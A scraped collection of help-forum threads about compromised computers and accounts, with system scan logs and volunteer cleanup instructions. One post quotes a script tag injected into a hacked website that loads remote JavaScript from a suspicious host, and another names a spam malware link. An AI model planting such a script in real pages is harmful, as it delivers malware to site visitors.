Here are the contents my .dds file:


DDS (Ver_10-03-17.01) - NTFSx86
Run by User at 9:49:41.87 on 09/07/2010
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_20
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.2038.1426 [GMT -7:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
svchost.exe
svchost.exe
C:\Program Files\AVG\AVG9\avgchsvx.exe
C:\Program Files\AVG\AVG9\avgrsx.exe
C:\Program Files\AVG\AVG9\avgcsrvx.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\Program Files\AVG\AVG9\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\System32\svchost.exe -k HTTPFilter
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\LogMeIn\x86\RaMaint.exe
C:\WINDOWS\Explorer.EXE
C:\Program Fil... Read more

Answer:Yahoo Account Compromised - Malware System Check

Hello Jess,

I'm not seeing any malware in these logs. It's difficult to say exactly how your Yahoo account got compromised. One possiblility is that one of your contacts was infected and you were spammed by them.

Let's see if an online scan picks up on anything. It can take several hours, so please be patient and allow it to run it's full course:

Establish an internet connection & perform an online scan with Firefox or Internet Explorer at Kaspersky Online Scanner

**Note**

To optimize scanning time and produce a more sensible report for review: Close any open programs
Turn off the real time scanner of any existing antivirus program while performing the online scan.
Click Accept, when prompted to download and install the program files and database of malware definitions.Click Run at the Security prompt.
The program will then begin downloading and installing and will also update the database.
Please be patient as this can take several minutes.
Once the update is complete, click on My Computer under the green Scan bar to the left to start the scan.
Once the scan is complete, it will display if your system has been infected. It does not provide an option to clean/disinfect. We only require a report from it.
Do NOT be alarmed by what you see in the report. Many of the finds have likely been quarantined.
Click View scan report at the bottom.
Click the Save Report As... button.
Click the Save as Text button to save the file to your desktop so that you may post ... Read more

1 more replies
Relevance 51.66%

As in introduction, I'm a casual computer user. I don't know much about technology, but I've noticed these forums bring a lot of help. And I really need it, I'm kind of panicked and have no informed perspective, no inkling of what to do next. a huge thank you to anybody who reviews this. 

 
Have an HP Pavilion quad core with*I believe*eight GB of memory. it is a desktop PC, It has windows 8. I will be happy to provide any more information as needed.
 
So it all started with downloading a version of Photoshop someone confirmed that worked. Bad idea. Normally I'm not that naive. I already had McAfee and avast antivirus installed. 
 
It was a really tempting offer. After I clicked the link , the problem began and inflated. 
It immediately confirmed it as malicious, and I x-ed out.
 
This is where I consider The issue from, I don't think there's anything else I've done to cause this.

 
Suddenly, I began getting certificate warnings in iTunes, Google Chrome, Internet explorer, you name it. This had never happened to me on the computer before. I can only remember one instance where the URL was suspicious, but it normally wasn't. I even got messages that somebody was connecting to my network/computer, or something similar, via MacFee.
 
There were also times where I would be browsing the Internet, and my click be directed to a random pop up that came out of nowhere. I noticed that my mouse lagged; I read th... Read more

Answer:Malware turning firewall off, certificate warnings, compromised PC?

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/554923 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more

2 more replies
Relevance 51.25%

Log files attached. Various redirects and pop ups whilst browsing.

Cheers,
 

Answer:User's Google Account Compromised - Instructed To Do A Malware Scan

Rerun RogueKiller and have it remove these items:
[RUN][SUSP PATH] HKCU\[...]\Run : PprKjbtu (C:\Users\JULIE\AppData\Local\hmaxyxke\pprkjbtu.exe [x]) -> FOUND
[RUN][SUSP PATH] HKUS\S-1-5-21-2030968110-4071869114-4025464302-1000\[...]\Run : PprKjbtu (C:\Users\JULIE\AppData\Local\hmaxyxke\pprkjbtu.exe [x]) -> FOUND
Then rerun Hitman and have it remove all the PUP's/

Please download Junkware Removal Tool to your desktop.
Shut down your protection software now to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Attach JRT.txt to your next message.
Reboot and rescan with both RogueKiller and Hitman and attack the new logs.

Tell me how things are running.
 

3 more replies
Relevance 51.25%

Hi, thanks in advance for your help.

Several weeks ago, my online accounts were compromised. I believe that my computer is the source of the infection, as it started acting funkily, and only accounts that I had accessed from this machine were compromised. I have already changed all of my account information; now is the first chance I've had to fix this computer.

here is my dds.txt:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.18015
Run by Larry at 16:58:07 on 2015-12-17
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.3561.1328 [GMT -8:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Microsoft Security Essentials *Enabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Spybot - Search and Destroy *Enabled/Outdated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\IDT\WDM\STacSV64.exe
C:\Windows\system32\svchost.exe -k NetworkServi... Read more

More replies
Relevance 51.25%

Hi, thanks in advance for your help.

Several weeks ago, my online accounts were compromised. I believe that my computer is the source of the infection, as it started acting funkily, and only accounts that I had accessed from this machine were compromised. I have already changed all of my account information; now is the first chance I've had to fix this computer.

here is my dds.txt:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.18015
Run by Larry at 16:58:07 on 2015-12-17
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.3561.1328 [GMT -8:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Microsoft Security Essentials *Enabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Spybot - Search and Destroy *Enabled/Outdated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\IDT\WDM\STacSV64.exe
C:\Windows\system32\svchost.exe -k NetworkServi... Read more

Answer:Online accounts compromised. Strongly Suspect Malware/Rootkit

Hello and welcome to TSF Draymond Green,

My name is Tolga and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Please download to and run all requested tools from your Desktop.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the c... Read more

3 more replies
Relevance 50.84%

At windows 10,  keyboard is compleatly unusable;  this includes external keyboards.  resetting keyboard language and type has no effect.   So I resorted to lenovo hardware / system restore.  When I press 'recover' button,  recovery / boot bios screen appears.   But when I select the "System Recovery" option,  the 'enter' button behaves like the escape button;  windows manager boots, not the firmware recovery app.  none of the other buttons work except Esc.   I was able to run hardware diagnostics.  No errors found.    I suspect I need to reload all firmware and hard drive.  

More replies
Relevance 50.84%

At windows 10,  keyboard is compleatly unusable;  this includes external keyboards.  resetting keyboard language and type has no effect.   So I resorted to lenovo hardware / system restore.  When I press 'recover' button,  recovery / boot bios screen appears.   But when I select the "System Recovery" option,  the 'enter' button behaves like the escape button;  windows manager boots, not the firmware recovery app.  none of the other buttons work except Esc.   I was able to run hardware diagnostics.  No errors found.    I suspect I need to reload all firmware and hard drive.  
 
 
Moderator comment: Model added to subject for clarity.

Answer:S20-30 - Firmware appears compromised by keylogger or malware; Lenovo recovery inoperable.

Good day and welcome to the community.
 
Sorry you're having difficulty.Please provide more information about your system (model, etc), otherwise it will be difficult for the community to assist you. We will also be able to confirm that your post is in the proper forum.Regards.

3 more replies
Relevance 50.02%

Hello.  I seem to be sharing my firewall privileges with a remote hacker and a system restore didn't help.  A similar posting at Tom's Hardware pointed to a corrupted/malware rundll32.exe file creating extraneous malware files (guard.tmp, filename.dll) in his Win/System32 folder.  I suspect I have something similar though couldn't find those same file names.  (His posting is here: http://www.tomshardware.com/forum/134388-45-mysterious-rundll32-administrator-privileges )
 
I have tried kaspersky, combofix, rskiller, hitman, symantec, emsisoft, avg, symantec, windows defender, etc.  I am not a tech guy by trade but serve as my own IT guy some months so any help I get is welcome.  I probably am supposed to be posting "hijack this" findings or something as a first step but haven't done anything like that in 12 years so I figured I would post my problem first.  Thank you.

More replies
Relevance 50.02%

Esteemed Forum Members,

This is my first posting here. I am a Java programmer/developer. And I look forward to participating. Although I generally find that I learn more from reading the posts of the knowledgeable folks here than with me talking.

My current question is to see if anyone knows any more about a computer affliction that has affected two friends in the past week. (They are in different groups, so these are separate "afflictions".)

The two are remarkably similar so I am hypothesizing that they are basically the same attack. I suspect that if I have bumped into two of these cases, you folks may have already been there and done that.

As I don't have access to either of their computers, and as they are rather naive MSWindows users, it might be difficult for me to run the various diagnosic tools on their systems.

Basically the symptom is that they received an email from a known source. (Yeah, I know...) And clicked on a link to one of the {canxhealth health24x medhealthx xmedx } dotcom websites. The result is that, at a minimum, their Yahoo email account was compromised and an email was sent out to all of their contacts. The sent email has no subject and contains only the link to the malware website.

Googling through the web, I see suggestions ranging from changing the email account password through reformatting the hard-drive and resetting external routers. I also see claims that none of the major anti-virus/firewall applications detect this... Read more

Answer:Yahoo Account Compromised, possible system compromised

Hello Chuck, First i will move you one forum down to Am I Hacked.Please read the first pinned topic there, Who To Contact If Your Yahoo Webmail Account Is Hacked Next follow tese instructions,also a pinned topic there How to receive help in the Am I Hacked? forum

5 more replies
Relevance 50.02%

my computer recently got a virus or worm or malware or something...anyways there was a huge amount of pop ups and executables going off, I shut down windows and they haven't reemerged, but there is about a 50% drop in speed.

Running Windows XP Pro SP3

Heres what I scans I ran(thorough scans)
-Avast
-Symantec Antivirus(installed after lag remained and removed avast)
-Spybot Search and Destroy
-A-Squared Free
-CCleaner

basically when I ran any of the above(excluding CCleaner) it turned off my computer...I booted up in Safemode and tried the scans again, and it shuts down at some point during the scan....im guessing its a virus that shuts down the computer when scanned....so any hints? I don't really want to reinstall Windows, since I got this CD Key cheaply from my school, but its only a one time install key supposedly....Im guessing this is possibly a bad worm, since my computer is semi-laggy...and I tried installing WoTLK and it took 2 hours to do on a machine I bought 1 year ago which was considered high end then

HijackThis log
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:13:03 PM, on 11/27/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16735)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEn... Read more

More replies
Relevance 49.61%

Yesterday everyon in my gmail contacts received an email from myself and in the body was a link and thats all it was "ivoges.com.br/limpallo.html" . I immediatly change all my email passwords. I have run spybot and mcafee full scan and they found nothing. I also dont believe my computer was even on when they were sent. The day before I upgraded to IE9. Is there anything else I should do? I am running Vista and IE 9 and here is my HiJack This log.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:25:42 PM, on 4/8/2011
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v9.00 (9.00.8112.16421)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\NVIDIA Corporation\nTune\nTuneCmd.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Hewlett-Packard\On-Screen OSD Indicator\OSD.exe
C:\hp\support\hpsysdrv.exe
C:\WINDOWS\System32\CtHelper.exe
C:\Program Files\McAfee.com\Agent\mcagent.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\WINDOWS\ehome\ehtray.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\hp\kbd\kbd.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\Macromed\Flash\FlashUtil10o_ActiveX.exe
C:\Program Files\Trend Micro\HiJackThis\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet ... Read more

More replies
Relevance 49.61%

A virus got hold of my FTP details and added some malicious javascript to it (I was using filezilla, did this contribute?). I'm in the process of taking the site down but Avira didn't report any detections in relation to this. It was bad code though so all it did was break the script. Here's what it looks like:?<html><body><script type="text/javascript" src="http://nw-cpm.cz.cc/media.js"> </script></body></html>>Logfile of Trend Micro HijackThis v2.0.4Scan saved at 2:13:21 PM, on 26/03/2011Platform: Windows 7 (WinNT 6.00.3504)MSIE: Internet Explorer v8.00 (8.00.7600.16385)Boot mode: NormalRunning processes:C:\Program Files (x86)\WhatPulse\WhatPulse.exeC:\Program Files (x86)\DU Meter\DUMeter.exeC:\Users\Trung\AppData\Roaming\Dropbox\bin\Dropbox.exeC:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exeC:\Program Files (x86)\Dell DataSafe Online\DataSafeOnline.exeC:\Program Files (x86)\Dell Support Center\bin\sprtcmd.exeC:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exeC:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeC:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeC:\Program Files (x86)\iTunes\iTunesHelper.exeC:\Program Fi... Read more

Answer:Virus - Website FTP details compromised

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you are unable to create a log because your computer cannot start up successfully please provide detailed information about the Windows version you are using: What we in particular need to know is version, edition and if it is a 32bit or a 64bit system. [/b]If you are unsure about any of these caracteristics, just let us know and we'll help you figuring it out. Please also tell us if you have your Windows CD/DVD handy.Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about y... Read more

8 more replies
Relevance 49.61%

Hello,

Yesterday evening, I received an e-mail that someone is trying to access my Yahoo! Account and I was advised to change my secret questions.

I signed into my e-mail and changed my questions. After a few minutes, I got a notification e-mail that my password has been changed. After that, that my account details have been changed.

I signed in from another PC (happily lying around and connected to the internet) and saved what I could, and what was most important. His goal, my PayPal account.

My idea is that I've been infected with a key logger of some sort and when I typed the password and the secret questions, I gave up my Yahoo! mail.

Now, I will try to see what I can do with my account, maybe get it back, but I feel that my security has been compromised.

I deleted all my cookies from this PC, I scanned the PC for viruses with Symantec Antivirus but found nothing.

I wish to ask, what can I do so I can securely log in to my accounts from this computer? (without formatting everything)

Ideas are appreciated.

Sincerely,
Andrei

Answer:Undetected virus may have compromised my Yahoo!

Sorry for the bump, but I really need some piece of advice...

1 more replies
Relevance 49.61%

My anti-virus software keeps closing down mid scan, and my browsers have been infected with the '100ksearches' trojan where all my search results get redirected to other sites. Please help, have tried running several anti-virus and trojan killing software in safe mode but when I boot up back in normal mode the same things happen.

Answer:Anti-virus software compromised

nassman,The infection will return if its source is the Master Boot Record. It loads the infection as soon as you boot into Windows!For this reason, please download aswMBR:http://public.avast.com/~gmerek/asw... Save it to the Desktop. XP users - Double-click aswMBR.exe to start the tool. Click ScanUpon completion of the scan, click ?Save log? and save it to the Desktop, Note - Do NOT attempt any fix anything!!. Please post the log produced by aswMBR in your next reply. Also, you will notice that another file is created on the Desktop. It is named MBR.dat.If you have a USB flash drive, please move the mbr.dat file to it. If not, move the mbr.dat from the Desktop, to the C:\ drive. This is important, just in case we need to have access to the MBR information!!Next, download TDSSKillerhttp://support.kaspersky.com/downlo...Execute TDSSKiller.exe by double-clicking on it.Click: ?Start Scan? If Malicious objects are found, do NOT allow the tool to Cure!Click the arrow next to 'Cure' and select Skip We need to see the report first, as it may show false detections!!Click: 'Continue'When the tool is done, a log is produced at the root drive which is typically C:\ For example, C:\TDSSKiller.2.4.0.0_24.07.2010_13.10.52_log.txtAlso post the TDSSKiller log in your reply..~~~~Retired - Doin' Dis, Dat, and slapping malware.

24 more replies
Relevance 49.2%

So yesterday while I was using Registry First Aid, a pop up mimicking windows appears and of course I clicked it, and now I have a virus problem.

Whenever I try to open any sort of adware or virus software I get a pop up that says "Windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access the item.". Most online virus scanners do not work as well, including browsers. I have ceased to use that computer for the mean time.

Additionally, I've received a call from my credit card company and it looks like I have some credit card fraud issues I have to deal with.
Therefore I would like to get rid of this virus as soon as possible and if not, then I'll reformat.

If anyone could help it would be greatly appreciated.

Thank You,
Michael

Answer:Virus Problem - Credit Card Compromised!

Hello...One or more of the infections is most likely a backdoor trojan as your symptoms indicate.This allows hackers to remotely control your computer, steal critical system information and download and execute files.I would counsel you to disconnect this PC from the Internet immediately. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable, and it would be wise to contact those same financial institutions to apprise them of your situation.Though the trojan has been identified and can be killed, because of it's backdoor functionality, your PC is very likely compromised and there is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?When Should I Format, How Should I ReinstallWe can still clean this machine but I can't guarantee that it will be 100% secure afterwards. Let me know what you decide to do.You can try this if you like.Please download Rkill by Grinler and save it to your desktop.Link 2Link 3Link 4Double-click on the Rkill desktop icon to run the tool.If using Vista, right-click on it and Run As Administrator.A black DOS box will briefly flash and ... Read more

1 more replies
Relevance 49.2%

My entire computer has been compromised. I no longer have access to my C: drive, anything I touch on as far my taskbar I'm getting error messages 0x80070005, 0x800c0008 and code 1203. My current Microsoft acct has been linked to an old Microsoft acct I closed so anything I try to download its been stopped by the closed Microsoft acct and there's absolutely nothing I can do. I've tried rebooting to factory settings using the HP disks I purchased and they are not working. When I go into the system and try to add my acct name to the properties I instantly see that code S12545645 show up instead of the Micrososoft acct  I set up for my computer. I don't know what to do at this point.  Everytime I try to restore when I go into settings I notice my computer is being remotely changed by way of VPN settings and there is nothing I do to change it to prevent it from happening. Any advice would be helpful. I'm literally at the point where I want to throw this computer away but I just purchased it less than a year ago.

Answer:Computer compromised

Hi: Try a clean install of W10 by making your own plain W10 installation media by using the Media Creation tool at the link below. https://www.microsoft.com/en-us/software-download/windows10

3 more replies
Relevance 49.2%

Hi all,

I have Win7 pre-release running on my loungeroom PC, as well as the old faithful XP on dual boot (second HDD).
After the October 22nd release, Win7 would not run, and has also shut down access to XP as well!!

Im was told that it would shut down every 2 hours until I paid money, but was not expecting my whole machine to be sabotaged?

Also read that I would get $100 off retail from using the pre-release Win7?

Anyone else like me - frustrated.

Automatic repair could not do justice to Win7 and it shut down no warning.

Answer:Computer compromised

I re-started and tried to get XP happening, but the screen disappeared permanently after the intro logo.
Then I re-set and tried Win7 again, and lo and behold, it came up and ran normally??? I have a TV program running on MCE as I type!

Any ideas as To why XP is compromised? I have done chkdsk in the recovery console.

1 more replies
Relevance 49.2%

My computer has been acting funny, websites not displaying properly, HTML messed up, hanging all of the time. It should be a high performance machine with Win 64, P6TD deluxe MB, 6GB Corsair Dominator RAM, but it's really sluggish. Here are the DDS log reports. My website was hacked recently, maybe because my PC was compromised. Not sure. Thanks in advance.
Sam

ps. I do have access to Windows Disc.


DDS (Ver_10-12-12.02) - FAT32_AMD64
Run by Monster at 9:38:13.24 on Mon 01/10/2011
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_22
Microsoft Windows 7 Ultimate 6.1.7600.0.1252.1.1033.18.6135.3268 [GMT 9:00]

AV: Trend Micro Titanium *Disabled/Updated* {68F968AC-2AA0-091D-848C-803E83E35902}
SP: Trend Micro Titanium *Disabled/Updated* {D3988948-0C9A-0693-BE3C-BB4CF86413BF}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\s... Read more

Answer:Computer Compromised

ANyone? DOes this look clean? Is that why nobody got back to me? I am having problems with websites like ESPN which is telling me that the server's certificate does match the host's name.

static.ak.fbcdn.net

I am getting weird HTML across the page instead of a clean website. Pages are loading slowly.

1 more replies
Relevance 49.2%

Hi,

My computer (husband's actually) has problems again. I did all the steps from the Read This first post and am attaching the logs it requests. Note, I couldn't perform any "fix" with HitmanPro as I was told that my trial license had expired - it did find issues however. Also, Malwarebytes did not find anything at all.

Please let me know to proceed.

Thanks.
 

Answer:Computer compromised (again)

You still need to attach the Hitman log. Also the log from running MBAM.

And please tell me what issues you are having.
 

12 more replies
Relevance 49.2%

Hello. Yesterday when I returned from lunch, my computer was logged out. I thought maybe I had a power outage, but the other computer on the network (server) was still logged in. So, I just logged back in and went back to work. This morning, when I came into work, again I was logged out. And again I just logged back in. While I was working today, I looked up and saw that I was logged out. When I went to log back on, now there was my icon, but also another one with a karate icon, and it said "administrator"...and that "person" was logged on. I was very concerned and tried to log back in, but it wouldn't let me. I shut off my computer and then turned it back on. Now, the only user I saw was mine. Some background....I have Windows XP, McAfee Security with a Firewall. I do use logmein.com, but it's password protected. Just to be safe, I turned that off. I looked around my files and found that someone named "administrator" was in my computer yesterday when I was out to lunch. Also it showed that my fax file was used around the same time. I found a new document in "recent documents" called "desktop" and when I clicked on that file, this is what came up:

[LocalizedFileNames]
Mail [email protected],-4
Desktop (create shortcut).[email protected],-21
Compressed (zipped) [email protected],-10148
I am very concerned that someone took some private information from me. Is there a way to find out what this was? An... Read more

Answer:Has my computer been compromised?

16 more replies
Relevance 49.2%

hello there, wonder if someone can help me out, I think someone has hacked my computer, what is the process of checking please

Answer:I think my computer has been compromised

What are the symptoms making you believe your computer has been compromised?  Download Security Check from here or here and save it to your Desktop. Double-click SecurityCheck.exe Follow the onscreen instructions inside of the black box. A Notepad document should open automatically called checkup.txt; please post the contents of that document.NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.NOTE 3. If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.Make sure the following options are checked:
Internet ServicesWindows FirewallSystem RestoreSecurity Center/Action CenterWindows UpdateWindows DefenderOther ServicesPress "Scan".It will create a log (FSS.txt) in the same directory the tool is run.Please copy and paste the log to your reply. Please download MiniToolBox and run it.Checkmark following boxes:Report IE Proxy SettingsReport FF Proxy SettingsList content of HostsList IP configurationList Winsock EntriesList last 10 Event Viewer logList Installed ProgramsList Devices (do NOT change any settings here)List Users, Partitions and Memory sizeList Restore PointsClick Go and post the result. Please download Malwarebytes Anti-Malware (MBAM) to ... Read more

1 more replies
Relevance 49.2%

Strange one this. My desktop which is wired to my router appears to have a probem. 2 of my bank accounts and ebay have both requested my secuity details when i try and logon, the sites url seem genuine. Why i am suspicious is that my laptop which is wireless can still access these sites using my normal security details. When i try and logon to ebay it says my account has been compromised and i need to go through its security again. Is it my pc thats at fault or something more sinister?

More replies
Relevance 49.2%

Helly all,
 
I had an issue with my email, did a search on Google and found a support website. I called them, they asked for card details and a screenshare
 
they then took over my system and I think installed somethings asthey showed me my passwords in a text file, also they sent an email from my account to themselves stating I authorize payment... I tried to stop it they kept writing and after I switched computer off just to get away, I feel I have been compromised. My bank said the same thing and a friend said thebest place to get help was here.
 
Please do help me clean my system from these leechers
 
I run windows
 
thank you

Answer:computer compromised seriously

I would suggest you replace the credit card and of course dispute any charges.
 
There are sites when doing a search for help represent themselves falsely as Microsoft, popular security programs and many other popular programs.
They are simply thieves.
 
It is likely that no malware was installed but the program used to remotely connect may still be on the computer and some crappy scan program or
two.
 
Use all of the programs below to find and remove both malware and adware.
 
Use CCleaner to remove Temporary files, program caches, cookies, logs, etc. Use the Default settings. No need to use the
Registry Cleaning Tool...risky. Pay close attention while installing and UNcheck offers of toolbars....especially Google.
After install, open CCleaner and run by clicking on the Run Cleaner button in the bottom right corner.
CCleaner - PC Optimization and Cleaning - Free Download
 
Download Malwarebytes' Anti-Malware from Here
Double-click mbam-setup-2.X.X.XXXX.exe to install the application (X's are the current version number).
Make sure a checkmark is placed next to Launch Malwarebytes' Anti-Malware, then click Finish.
Once MBAM opens, when it says Your databases are out of date, click the Fix Now button.
Click the Settings tab at the top, and then in the left column, select Detections and Protections, and if not already checked place a checkmark in the selection box for Scan for rootkits.
Click the Scan tab at the top of the program window, select Threat S... Read more

2 more replies
Relevance 49.2%

I downloaded a few songs from LimeWire last night. Two of them did not play music and I was suspicious of them, so I deleted them. Then I ran stinger and it isolated one of the files as being a UA trojan dopwnloader and it said it deleted it. I searched the computer for the other file name and it did not come up. Ok, now today, I opened a My Docs folder and I notcied every folder in there is "Date Accessed" on 3/1/2009 at 8:58 pm. Also a bunch of files are listed as date accessed this morning and afternoon. Some info in those files is sensitive. Is my computer security compromised?
 

Answer:Is my computer compromised?

16 more replies
Relevance 49.2%

